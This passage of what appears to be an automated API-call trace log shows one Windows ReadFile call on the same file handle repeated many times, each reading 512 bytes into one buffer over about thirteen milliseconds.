lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.042] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.042] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.044] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.044] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.044] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.044] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.044] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.044] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.044] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.045] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.045] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.045] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.045] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.045] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.048] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.048] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.048] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.048] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.048] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.048] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.048] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, 